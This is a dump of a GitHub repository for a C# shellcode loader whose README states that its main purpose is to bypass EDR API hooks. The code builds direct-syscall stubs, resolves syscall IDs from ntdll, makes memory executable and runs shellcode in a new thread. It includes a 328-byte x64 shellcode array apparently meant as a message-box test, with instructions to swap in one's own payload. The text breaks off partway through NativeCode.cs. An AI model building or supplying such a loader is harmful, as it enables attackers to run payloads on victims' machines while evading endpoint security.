├── .vs └── SysCall_ShellcodeLoad │ └── v16 │ └── .suo ├── README.md ├── SysCall_ShellcodeLoad.sln └── SysCall_ShellcodeLoad ├── App.config ├── Auto_NativeCode.cs ├── NativeCode.cs ├── Program.cs ├── Properties └── AssemblyInfo.cs ├── SysCall_ShellcodeLoad.csproj ├── bin ├── Debug │ ├── SysCall_ShellcodeLoad.exe │ ├── SysCall_ShellcodeLoad.exe.config │ └── SysCall_ShellcodeLoad.pdb ├── x64 │ └── Debug │ │ ├── SysCall_ShellcodeLoad.exe │ │ ├── SysCall_ShellcodeLoad.exe.config │ │ └── SysCall_ShellcodeLoad.pdb └── x86 │ └── Debug │ ├── SysCall_ShellcodeLoad.exe │ ├── SysCall_ShellcodeLoad.exe.config │ └── SysCall_ShellcodeLoad.pdb └── obj ├── Debug ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs ├── DesignTimeResolveAssemblyReferencesInput.cache ├── SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache ├── SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt ├── SysCall_ShellcodeLoad.csprojAssemblyReference.cache ├── SysCall_ShellcodeLoad.exe └── SysCall_ShellcodeLoad.pdb ├── x64 └── Debug │ ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs │ ├── DesignTimeResolveAssemblyReferencesInput.cache │ ├── SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache │ ├── SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt │ ├── SysCall_ShellcodeLoad.csprojAssemblyReference.cache │ ├── SysCall_ShellcodeLoad.exe │ └── SysCall_ShellcodeLoad.pdb └── x86 └── Debug ├── .NETFramework,Version=v4.7.2.AssemblyAttributes.cs ├── DesignTimeResolveAssemblyReferencesInput.cache ├── SysCall_ShellcodeLoad.csproj.CoreCompileInputs.cache ├── SysCall_ShellcodeLoad.csproj.FileListAbsolute.txt ├── SysCall_ShellcodeLoad.csprojAssemblyReference.cache ├── SysCall_ShellcodeLoad.exe └── SysCall_ShellcodeLoad.pdb /.vs/SysCall_ShellcodeLoad/v16/.suo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Kara-4search/SysCall_ShellcodeLoad_Csharp/dfa401fd59b02ec85e6d7158c508619935986b0b/.vs/SysCall_ShellcodeLoad/v16/.suo -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # SysCall_ShellcodeLoad_Csharp 2 | 3 | Blog link: working on it. 4 | 5 | Github Link: https://github.com/Kara-4search/SysCall_ShellcodeLoad_Csharp 6 | 7 | - Base on my another project: https://github.com/Kara-4search/Simple_ShellCodeLoader_CSharp 8 | - A shellcode loader written in CSharp, the main purpose is to bypass the EDR API hook. 9 | - Only tested in Win10_x64, may not gonna work in x86. 10 | - Loading shellcode with direct syscall. 11 | - You need to replace the "syscall identifier" with your syscall ID, which you could find on your system 12 | - About how to find the syscall ID on your system, check the link below: 13 | 14 | 1. Use windbg: https://jhalon.github.io/utilizing-syscalls-in-csharp-2/ 15 | 2. Check the system call table: https://j00ru.vexillium.org/syscalls/nt/64/ 16 | 3. Find the syscall ID automatically(DONE) 17 | - If the AV/EDRs hooked level is higher than the NTDLL level, the "Auto_NativeCode" works fine. 18 | - If the AV/EDRs already hooked some functions in NTDLL, in this case, the "Auto_NativeCode" is not gonna works, cause "GetModuleHandle" loads NTDLL from memory, which is actually the hooked version. 19 | 20 | - Original shellcode is a Message 21 | ``` 22 | /* Messagebox shellcode */ 23 | 24 | byte[] buf1 = new byte[328] { 25 | 0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x00, 0x00, 26 | 0x00, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65, 27 | 0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b, 28 | 0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0x0f, 0xb7, 0x4a, 29 | 0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x02, 30 | 0x2c, 0x20, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0xe2, 0xed, 0x52, 31 | 0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48, 32 | 0x01, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x48, 0x85, 0xc0, 33 | 0x74, 0x6f, 0x48, 0x01, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44, 34 | 0x8b, 0x40, 0x20, 0x49, 0x01, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e, 35 | 0x41, 0x8b, 0x34, 0x88, 0x48, 0x01, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31, 36 | 0xc0, 0xac, 0x41, 0xc1, 0xc9, 0x0d, 0x41, 0x01, 0xc1, 0x38, 0xe0, 0x75, 37 | 0xf1, 0x3e, 0x4c, 0x03, 0x4c, 0x24, 0x08, 0x45, 0x39, 0xd1, 0x75, 0xd6, 38 | 0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x01, 0xd0, 0x66, 0x3e, 0x41, 39 | 0x8b, 0x0c, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x01, 0xd0, 0x3e, 40 | 0x41, 0x8b, 0x04, 0x88, 0x48, 0x01, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e, 41 | 0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20, 42 | 0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12, 43 | 0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x00, 0x00, 0x00, 44 | 0x00, 0x3e, 0x48, 0x8d, 0x95, 0x1a, 0x01, 0x00, 0x00, 0x3e, 0x4c, 0x8d, 45 | 0x85, 0x35, 0x01, 0x00, 0x00, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83, 46 | 0x56, 0x07, 0xff, 0xd5, 0xbb, 0xe0, 0x1d, 0x2a, 0x0a, 0x41, 0xba, 0xa6, 47 | 0x95, 0xbd, 0x9d, 0xff, 0xd5, 0x48, 0x83, 0xc4, 0x28, 0x3c, 0x06, 0x7c, 48 | 0x0a, 0x80, 0xfb, 0xe0, 0x75, 0x05, 0xbb, 0x47, 0x13, 0x72, 0x6f, 0x6a, 49 | 0x00, 0x59, 0x41, 0x89, 0xda, 0xff, 0xd5, 0x48, 0x65, 0x6C, 0x6C, 0x6F, 50 | 0x20, 0x77, 0x6F, 0x72, 0x6C, 0x64, 0x20, 0x76, 0x69, 0x61, 0x20, 0x73, 51 | 0x79, 0x73, 0x63, 0x61, 0x6C, 0x6C, 0x00, 0x41, 0x50, 0x49, 0x20, 0x54, 52 | 0x65, 0x73, 0x74, 0x00 53 | }; 54 | 55 | ``` 56 | - You may need to read those posts below **the Reference link** so you could understand how it works. 57 | - Feel free to make any issues. 58 | 59 | 60 | ## Usage 61 | 1. I updated the SysCall_ShellcodeLoad, now it's gonna find the syscall ID automatically(Check the file - Auto_NativeCode.cs). 62 | 2. If you want to test the old verison SysCall_ShellcodeLoad, 63 | * You just need to remove all the "Auto_NativeCode" from Program.cs 64 | * And Replace the syscall ID with your own. 65 | 3. Replace the "buf1" with your own shellcode. 66 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/SysCall_ShellcodeLoad_buf1.png) 67 | 4. Replace the syscall ID with your own in NativeCode.cs(Only when you use NativeCode in steal of Auto_NativeCode). 68 | * There are three syscall IDs you need to replace. 69 | - 1). NtAllocateVirtualMemory 70 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/SysCall_ShellcodeLoad_CUntAVM.png) 71 | - 2). NtCreateThreadEx 72 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/SysCall_ShellcodeLoad_CUntCT.png) 73 | - 3). NtWaitForSingleObject 74 | ![avatar](https://raw.githubusercontent.com/Kara-4search/tempPic/main/SysCall_ShellcodeLoad_CUntWFSO.png) 75 | 76 | ## TO-DO list 77 | 78 | 1. ~~Working on both x64 and x86~~ 79 | 80 | 2. Make the syscall array more flexible 81 | 82 | 83 | 84 | 85 | ## Reference link: 86 | 87 | 1. https://github.com/SolomonSklash/SyscallPOC 88 | 2. https://jhalon.github.io/utilizing-syscalls-in-csharp-1/ 89 | 3. https://jhalon.github.io/utilizing-syscalls-in-csharp-2/ 90 | 4. https://www.solomonsklash.io/syscalls-for-shellcode-injection.html 91 | 5. https://www.pinvoke.net/default.aspx 92 | 6. https://github.com/jhalon/SharpCall/blob/master/Syscalls.cs 93 | 7. https://github.com/badBounty/directInjectorPOC 94 | 8. https://j00ru.vexillium.org/syscalls/nt/64/ 95 | 9. http://undocumented.ntinternals.net/index.html?page=UserMode%2FUndocumented%20Functions%2FMemory%20Management%2FVirtual%20Memory%2FNtAllocateVirtualMemory.html 96 | 97 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 16 4 | VisualStudioVersion = 16.0.31129.286 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "SysCall_ShellcodeLoad", "SysCall_ShellcodeLoad\SysCall_ShellcodeLoad.csproj", "{A9DEC923-E66D-46D5-84EE-6D4733FF44CE}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|Any CPU = Debug|Any CPU 11 | Debug|x64 = Debug|x64 12 | Debug|x86 = Debug|x86 13 | Release|Any CPU = Release|Any CPU 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|Any CPU.ActiveCfg = Debug|Any CPU 19 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|Any CPU.Build.0 = Debug|Any CPU 20 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x64.ActiveCfg = Debug|x64 21 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x64.Build.0 = Debug|x64 22 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x86.ActiveCfg = Debug|x86 23 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Debug|x86.Build.0 = Debug|x86 24 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|Any CPU.ActiveCfg = Release|Any CPU 25 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|Any CPU.Build.0 = Release|Any CPU 26 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x64.ActiveCfg = Release|x64 27 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x64.Build.0 = Release|x64 28 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x86.ActiveCfg = Release|x86 29 | {A9DEC923-E66D-46D5-84EE-6D4733FF44CE}.Release|x86.Build.0 = Release|x86 30 | EndGlobalSection 31 | GlobalSection(SolutionProperties) = preSolution 32 | HideSolutionNode = FALSE 33 | EndGlobalSection 34 | GlobalSection(ExtensibilityGlobals) = postSolution 35 | SolutionGuid = {317660C1-68DC-426F-8A2D-ABC4AA7D3C32} 36 | EndGlobalSection 37 | EndGlobal 38 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/App.config: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/Auto_NativeCode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Runtime.InteropServices; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | using System.Runtime.InteropServices; 8 | using System.ComponentModel; 9 | using System.Diagnostics; 10 | 11 | /* 12 | #include 13 | #include 14 | #include 15 | #pragma comment(linker, "/section:.data,RWE")//.data段可执行 16 | 17 | CHAR FuncExample[] = { 18 | 0x4c,0x8b,0xd1, //mov r10,rcx 19 | 0xb8,0xb9,0x00,0x00,0x00, //mov eax,0B9h 20 | 0x0f,0x05, //syscall 21 | 0xc3 //ret 22 | }; 23 | 24 | typedef NTSTATUS(NTAPI* pNtAllocateVirtualMemory)(//函数指针 25 | HANDLE ProcessHandle, 26 | PVOID* BaseAddress, 27 | ULONG_PTR ZeroBits, 28 | PSIZE_T RegionSize, 29 | ULONG AllocationType, 30 | ULONG Protect); 31 | 32 | 33 | DOUBLE GetAndSetSysCall(TCHAR* szFuncName) { 34 | DWORD SysCallid = 0; 35 | HMODULE hModule = GetModuleHandle(_T("ntdll.dll")); 36 | DWORD64 FuncAddr = (DWORD64)GetProcAddress(hModule, (LPCSTR)szFuncName); 37 | LPVOID CallAddr = (LPVOID)(FuncAddr + 4); 38 | ReadProcessMemory(GetCurrentProcess(), CallAddr, &SysCallid, 4, NULL); 39 | memcpy(FuncExample+4, (CHAR*)&SysCallid, 2); 40 | return (DOUBLE)SysCallid; 41 | } 42 | 43 | int main() { 44 | LPVOID Address = NULL; 45 | SIZE_T uSize = 0x1000; 46 | DOUBLE call = GetAndSetSysCall((TCHAR*)"NtAllocateVirtualMemory"); 47 | pNtAllocateVirtualMemory NtAllocateVirtualMemory = (pNtAllocateVirtualMemory)&FuncExample; 48 | NTSTATUS status = NtAllocateVirtualMemory(GetCurrentProcess(), &Address, 0, &uSize, MEM_COMMIT, PAGE_READWRITE); 49 | return 0; 50 | 51 | } 52 | */ 53 | 54 | namespace SysCall_ShellcodeLoad 55 | { 56 | class Auto_NativeCode 57 | { 58 | [DllImport("kernel32.dll")] 59 | public static extern bool VirtualProtectEx 60 | ( 61 | IntPtr hProcess, 62 | IntPtr lpAddress, 63 | UIntPtr dwSize, 64 | uint flNewProtect, 65 | out uint lpflOldProtect 66 | ); 67 | 68 | [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)] 69 | static extern IntPtr GetProcAddress(IntPtr hModule, string procName); 70 | 71 | [DllImport("kernel32.dll", CharSet = CharSet.Auto)] 72 | public static extern IntPtr GetModuleHandle(string lpModuleName); 73 | 74 | [DllImport("kernel32.dll", SetLastError = true)] 75 | public static extern IntPtr GetCurrentProcess(); 76 | 77 | [DllImport("kernel32.dll")] 78 | public static extern void RtlZeroMemory(IntPtr pBuffer, int length); 79 | 80 | [DllImport("kernel32.dll", SetLastError = true)] 81 | static extern bool ReadProcessMemory( 82 | IntPtr hProcess, 83 | IntPtr lpBaseAddress, 84 | IntPtr lpBuffer, 85 | int dwSize, 86 | out uint lpNumberOfBytesRead 87 | ); 88 | 89 | public uint NTSTATUS; 90 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 91 | 92 | // public uint SYSid = 0; 93 | public static byte[] SYSbyte1 = 94 | { 95 | 0x4c, 0x8b, 0xd1, 96 | 0xb8 97 | }; 98 | 99 | public static byte[] SYSbyte2 = 100 | { 101 | 0x00, 0x00, 0x00, 102 | 0x0F, 0x05, 103 | 0xC3 104 | }; 105 | 106 | public enum AllocationType : ulong 107 | { 108 | Commit = 0x1000, 109 | Reserve = 0x2000, 110 | Decommit = 0x4000, 111 | Release = 0x8000, 112 | Reset = 0x80000, 113 | Physical = 0x400000, 114 | TopDown = 0x100000, 115 | WriteWatch = 0x200000, 116 | LargePages = 0x20000000 117 | } 118 | 119 | 120 | public static uint GetSyscallID(string SysFunName) 121 | { 122 | uint SyscallID = 0; 123 | IntPtr SyscallID_mem = Marshal.AllocHGlobal(Marshal.SizeOf(SyscallID)); 124 | RtlZeroMemory(SyscallID_mem, Marshal.SizeOf(SyscallID)); 125 | 126 | IntPtr hModule = GetModuleHandle("ntdll.dll"); 127 | IntPtr FunAddr = GetProcAddress(hModule, SysFunName); 128 | IntPtr CallAddr = FunAddr + 4; 129 | 130 | uint temp; 131 | bool read_result = ReadProcessMemory(GetCurrentProcess(), CallAddr, SyscallID_mem, 4, out temp); 132 | // Console.WriteLine("Error: " + Marshal.GetLastWin32Error()); 133 | // Console.WriteLine("CallAddr:" + CallAddr + ", SyscallID" + SyscallID + ", temp: " + temp); 134 | 135 | SyscallID = (uint)Marshal.ReadInt32(SyscallID_mem); 136 | return SyscallID; 137 | } 138 | 139 | public static uint NtAllocateVirtualMemory 140 | ( 141 | IntPtr ProcessHandle, 142 | ref IntPtr BaseAddress, 143 | IntPtr ZeroBits, 144 | ref UIntPtr RegionSize, 145 | uint AllocationType, 146 | uint Protect 147 | ) 148 | { 149 | // set byte array of bNtAllocateVirtualMemory to new byte array called syscall 150 | uint SyscallID = Auto_NativeCode.GetSyscallID("NtAllocateVirtualMemory"); 151 | byte[] syscall1 = SYSbyte1; 152 | byte[] syscallid = { (byte)SyscallID }; 153 | byte[] syscall2 = SYSbyte2; 154 | byte[] sysfinal = syscall1.Concat(syscallid).Concat(syscall2).ToArray(); 155 | 156 | /* 157 | foreach(byte temp in sysfinal) 158 | { 159 | Console.WriteLine("Sysfinal: " + temp); 160 | } 161 | */ 162 | 163 | // specify unsafe context 164 | unsafe 165 | { 166 | // create new byte pointer and set value to our syscall byte array 167 | fixed (byte* ptr = sysfinal) 168 | { 169 | // cast the byte array pointer into a C# IntPtr called memoryAddress 170 | IntPtr memoryAddress = (IntPtr)ptr; 171 | 172 | // Change memory access to RX for our assembly code 173 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)sysfinal.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect)) 174 | { 175 | throw new Win32Exception(); 176 | } 177 | 178 | // Get delegate for NtAllocateVirtualMemory 179 | DelegatesStruct.NtAllocateVirtualMemory assembledFunction = (DelegatesStruct.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtAllocateVirtualMemory)); 180 | 181 | return (uint)assembledFunction( 182 | ProcessHandle, 183 | ref BaseAddress, 184 | ZeroBits, 185 | ref RegionSize, 186 | AllocationType, 187 | Protect); 188 | } 189 | } 190 | 191 | } 192 | 193 | public static uint NtCreateThreadEx 194 | ( 195 | out IntPtr hThread, 196 | uint DesiredAccess, 197 | IntPtr ObjectAttributes, 198 | IntPtr ProcessHandle, 199 | IntPtr lpStartAddress, 200 | IntPtr lpParameter, 201 | bool CreateSuspended, 202 | uint StackZeroBits, 203 | uint SizeOfStackCommit, 204 | uint SizeOfStackReserve, 205 | IntPtr lpBytesBuffer 206 | ) 207 | { 208 | // set byte array of bNtCreateThread to new byte array called syscall 209 | 210 | uint SyscallID = Auto_NativeCode.GetSyscallID("NtCreateThreadEx"); 211 | byte[] syscall1 = SYSbyte1; 212 | byte[] syscallid = { (byte)SyscallID }; 213 | byte[] syscall2 = SYSbyte2; 214 | byte[] sysfinal = syscall1.Concat(syscallid).Concat(syscall2).ToArray(); 215 | 216 | // specify unsafe context 217 | unsafe 218 | { 219 | // create new byte pointer and set value to our syscall byte array 220 | fixed (byte* ptr = sysfinal) 221 | { 222 | // cast the byte array pointer into a C# IntPtr called memoryAddress 223 | IntPtr memoryAddress = (IntPtr)ptr; 224 | 225 | // Change memory access to RX for our assembly code 226 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)sysfinal.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect)) 227 | { 228 | throw new Win32Exception(); 229 | } 230 | 231 | // Get delegate for NtCreateThread 232 | DelegatesStruct.NtCreateThreadEx assembledFunction = (DelegatesStruct.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtCreateThreadEx)); 233 | 234 | return (uint)assembledFunction( 235 | out hThread, 236 | DesiredAccess, 237 | ObjectAttributes, 238 | ProcessHandle, 239 | lpStartAddress, 240 | lpParameter, 241 | CreateSuspended, 242 | StackZeroBits, 243 | SizeOfStackCommit, 244 | SizeOfStackReserve, 245 | lpBytesBuffer 246 | ); 247 | } 248 | } 249 | } 250 | 251 | public static uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout) 252 | { 253 | // set byte array of bNtWaitForSingleObject to new byte array called syscall 254 | 255 | uint SyscallID = Auto_NativeCode.GetSyscallID("NtWaitForSingleObject"); 256 | byte[] syscall1 = SYSbyte1; 257 | byte[] syscallid = { (byte)SyscallID }; 258 | byte[] syscall2 = SYSbyte2; 259 | byte[] sysfinal = syscall1.Concat(syscallid).Concat(syscall2).ToArray(); 260 | 261 | // specify unsafe context 262 | unsafe 263 | { 264 | // create new byte pointer and set value to our syscall byte array 265 | fixed (byte* ptr = sysfinal) 266 | { 267 | // cast the byte array pointer into a C# IntPtr called memoryAddress 268 | IntPtr memoryAddress = (IntPtr)ptr; 269 | 270 | // Change memory access to RX for our assembly code 271 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)sysfinal.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect)) 272 | { 273 | throw new Win32Exception(); 274 | } 275 | 276 | // Get delegate for NtWaitForSingleObject 277 | DelegatesStruct.NtWaitForSingleObject assembledFunction = (DelegatesStruct.NtWaitForSingleObject)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtWaitForSingleObject)); 278 | 279 | return (uint)assembledFunction(Object, Alertable, Timeout); 280 | } 281 | } 282 | } 283 | 284 | 285 | public struct DelegatesStruct 286 | { 287 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 288 | public delegate uint NtAllocateVirtualMemory( 289 | IntPtr ProcessHandle, 290 | ref IntPtr BaseAddress, 291 | IntPtr ZeroBits, 292 | ref UIntPtr RegionSize, 293 | ulong AllocationType, 294 | ulong Protect); 295 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 296 | public delegate uint NtCreateThreadEx( 297 | out IntPtr hThread, 298 | uint DesiredAccess, 299 | IntPtr ObjectAttributes, 300 | IntPtr ProcessHandle, 301 | IntPtr lpStartAddress, 302 | IntPtr lpParameter, 303 | bool CreateSuspended, 304 | uint StackZeroBits, 305 | uint SizeOfStackCommit, 306 | uint SizeOfStackReserve, 307 | IntPtr lpBytesBuffer 308 | ); 309 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 310 | public delegate uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout); 311 | } 312 | 313 | } 314 | } 315 | -------------------------------------------------------------------------------- /SysCall_ShellcodeLoad/NativeCode.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.Linq; 4 | using System.Text; 5 | using System.Threading.Tasks; 6 | using System.Runtime.InteropServices; 7 | using System.ComponentModel; 8 | using System.Diagnostics; 9 | 10 | 11 | namespace SysCall_ShellcodeLoad 12 | { 13 | 14 | class NativeCode 15 | { 16 | public uint NTSTATUS; 17 | public static UInt32 PAGE_EXECUTE_READWRITE = 0x40; 18 | 19 | public enum AllocationType : ulong 20 | { 21 | Commit = 0x1000, 22 | Reserve = 0x2000, 23 | Decommit = 0x4000, 24 | Release = 0x8000, 25 | Reset = 0x80000, 26 | Physical = 0x400000, 27 | TopDown = 0x100000, 28 | WriteWatch = 0x200000, 29 | LargePages = 0x20000000 30 | } 31 | 32 | 33 | [DllImport("kernel32.dll")] 34 | public static extern bool VirtualProtectEx 35 | ( 36 | IntPtr hProcess, 37 | IntPtr lpAddress, 38 | UIntPtr dwSize, 39 | uint flNewProtect, 40 | out uint lpflOldProtect 41 | ); 42 | 43 | [DllImport("kernel32.dll", SetLastError = true)] 44 | public static extern IntPtr GetCurrentProcess(); 45 | 46 | /* 47 | ntdll!NtAllocateVirtualMemory: 48 | 00007ffc`7a50d110 4c8bd1 mov r10,rcx 49 | 00007ffc`7a50d113 b818000000 mov eax,18h 50 | 00007ffc`7a50d118 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 51 | 00007ffc`7a50d120 7503 jne ntdll!NtAllocateVirtualMemory+0x15 (00007ffc`7a50d125) 52 | 00007ffc`7a50d122 0f05 syscall 53 | 00007ffc`7a50d124 c3 ret 54 | 00007ffc`7a50d125 cd2e int 2Eh 55 | 00007ffc`7a50d127 c3 ret 56 | */ 57 | 58 | static byte[] CuNtAVM = 59 | { 60 | 0x4c, 0x8b, 0xd1, // mov r10,rcx 61 | 0xb8, 0x18, 0x00, 0x00, 0x00, // mov eax,18h 62 | 0x0F, 0x05, // syscall 63 | 0xC3 // ret 64 | }; 65 | 66 | public static uint NtAllocateVirtualMemory 67 | ( 68 | IntPtr ProcessHandle, 69 | ref IntPtr BaseAddress, 70 | IntPtr ZeroBits, 71 | ref UIntPtr RegionSize, 72 | uint AllocationType, 73 | uint Protect) 74 | { 75 | // set byte array of bNtAllocateVirtualMemory to new byte array called syscall 76 | byte[] syscall = CuNtAVM; 77 | 78 | // specify unsafe context 79 | unsafe 80 | { 81 | // create new byte pointer and set value to our syscall byte array 82 | fixed (byte* ptr = syscall) 83 | { 84 | // cast the byte array pointer into a C# IntPtr called memoryAddress 85 | IntPtr memoryAddress = (IntPtr)ptr; 86 | 87 | // Change memory access to RX for our assembly code 88 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect)) 89 | { 90 | throw new Win32Exception(); 91 | } 92 | 93 | // Get delegate for NtAllocateVirtualMemory 94 | DelegatesStruct.NtAllocateVirtualMemory assembledFunction = (DelegatesStruct.NtAllocateVirtualMemory)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtAllocateVirtualMemory)); 95 | 96 | return (uint)assembledFunction( 97 | ProcessHandle, 98 | ref BaseAddress, 99 | ZeroBits, 100 | ref RegionSize, 101 | AllocationType, 102 | Protect); 103 | } 104 | } 105 | 106 | } 107 | 108 | /* 109 | ntdll!NtCreateThreadEx: 110 | 00007ffc`7a50e620 4c8bd1 mov r10,rcx 111 | 00007ffc`7a50e623 b8c1000000 mov eax,0C1h 112 | 00007ffc`7a50e628 f604250803fe7f01 test byte ptr[SharedUserData + 0x308(00000000`7ffe0308)],1 113 | 00007ffc`7a50e630 7503 jne ntdll!NtCreateThreadEx+0x15 (00007ffc`7a50e635) 114 | 00007ffc`7a50e632 0f05 syscall 115 | 00007ffc`7a50e634 c3 ret 116 | */ 117 | 118 | static byte[] CuNtCT = 119 | { 120 | 0x4c, 0x8b, 0xd1, // mov r10,rcx 121 | 0xb8, 0xc1, 0x00, 0x00, 0x00, // mov eax,c1h 122 | 0x0F, 0x05, // syscall 123 | 0xC3 // ret 124 | }; 125 | 126 | public static uint NtCreateThreadEx 127 | ( 128 | out IntPtr hThread, 129 | uint DesiredAccess, 130 | IntPtr ObjectAttributes, 131 | IntPtr ProcessHandle, 132 | IntPtr lpStartAddress, 133 | IntPtr lpParameter, 134 | bool CreateSuspended, 135 | uint StackZeroBits, 136 | uint SizeOfStackCommit, 137 | uint SizeOfStackReserve, 138 | IntPtr lpBytesBuffer 139 | ) 140 | { 141 | // set byte array of bNtCreateThread to new byte array called syscall 142 | byte[] syscall = CuNtCT; 143 | 144 | // specify unsafe context 145 | unsafe 146 | { 147 | // create new byte pointer and set value to our syscall byte array 148 | fixed (byte* ptr = syscall) 149 | { 150 | // cast the byte array pointer into a C# IntPtr called memoryAddress 151 | IntPtr memoryAddress = (IntPtr)ptr; 152 | 153 | // Change memory access to RX for our assembly code 154 | if (!VirtualProtectEx(Process.GetCurrentProcess().Handle, memoryAddress, (UIntPtr)syscall.Length, PAGE_EXECUTE_READWRITE, out uint oldprotect)) 155 | { 156 | throw new Win32Exception(); 157 | } 158 | 159 | // Get delegate for NtCreateThread 160 | DelegatesStruct.NtCreateThreadEx assembledFunction = (DelegatesStruct.NtCreateThreadEx)Marshal.GetDelegateForFunctionPointer(memoryAddress, typeof(DelegatesStruct.NtCreateThreadEx)); 161 | 162 | return (uint)assembledFunction( 163 | out hThread, 164 | DesiredAccess, 165 | ObjectAttributes, 166 | ProcessHandle, 167 | lpStartAddress, 168 | lpParameter, 169 | CreateSuspended, 170 | StackZeroBits, 171 | SizeOfStackCommit, 172 | SizeOfStackReserve, 173 | lpBytesBuffer 174 | ); 175 | } 176 | } 177 | } 178 | 179 | /* 180 | ntdll!NtWaitForSingleObject: 181 | 00007ffc`7a50ce90 4c8bd1 mov r10,rcx 182 | 00007ffc`7a50ce93 b804000000 mov eax,4 183 | 00007ffc`7a50ce98 f604250803fe7f01 test byte ptr [SharedUserData+0x308 (00000000`7ffe0308)],1 184 | 00007ffc`7a50cea0 7503 jne ntdll!NtWaitForSingleObject+0x15 (00007ffc`7a50cea5) 185 | 00007ffc`7a50cea2 0f05 syscall 186 | 00007ffc`7a50cea4 c3 ret 187 | */ 188 | static byte[] CuNtWFSO = 189 | { 190 | 0x4c, 0x8b, 0xd1, // mov r10,rcx 191 | 0xb8, 0x04, 0x00, 0x00, 0x00, // mov eax,04h 192 | 0x0F, 0x05, // syscall 193 | 0xC3 // ret 194 | }; 195 | 196 | public static uint NtWaitForSingleObject(IntPtr Object, bool Alertable, uint Timeout) 197 | 